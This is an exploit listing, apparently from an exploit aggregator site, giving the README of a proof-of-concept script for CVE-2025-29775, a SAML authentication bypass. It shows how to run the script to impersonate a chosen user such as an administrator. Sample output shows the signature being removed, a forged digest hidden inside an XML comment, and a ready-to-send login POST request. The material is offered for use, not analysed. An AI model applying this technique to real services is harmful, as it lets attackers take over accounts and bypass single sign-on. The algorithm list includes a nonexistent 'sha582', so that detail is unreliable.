Exploit for CVE-2025-29775

## https://sploitus.com/exploit?id=1C3B678E-C109-553B-8D92-7010342631BC
# Proof of concept for CVE-2025-29775

This POC variant requires a filename containing the POST request with a signed SAML response.

Usage python cve-2025-29775.py [filename] [parameter] [username] [algorithm]

Algorithms supported: sha1, sha256, sha384, sha582

* Filename:  Name of the file containing the POST request with the SAML response
* Parameter: Name of the parameter containing the URL base64 encoded SAML response.
* Username:  Name of the username to impersonate
* Algorithm: Hashing algorithm to be used

```
python cve-2025-29775.py req.txt samlResponse admin@vulnerable.com sha256

Username inserted: admin@vulnerable.com

Signature removed...

Original digest value: MSZxVlked38OM6yV0JOm0Cp/Vm1S4Fn4VpCalyGF1B8=
New digest value: <!--16yA5mQTuW+pcS8aRmqpXl9ozriR97TyiAzeiuuUuX4=-->MSZxVlked38OM6yV0JOm0Cp/Vm1S4Fn4VpCalyGF1B8=
Hashing algorithm used: sha256

Signature with malicious digest inserted...

Full request (copied to clipboard):

POST /login/callback HTTP/1.1
Host: localhost
Cookie: foo=bar;
User-Agent: Netscape
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 7082
Origin: https://idp.localhost.me
Referer: https://idp.localhost.me
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
Priority: u=0, i
Te: trailers
Connection: keep-alive

SAMLResponse=[snip]
```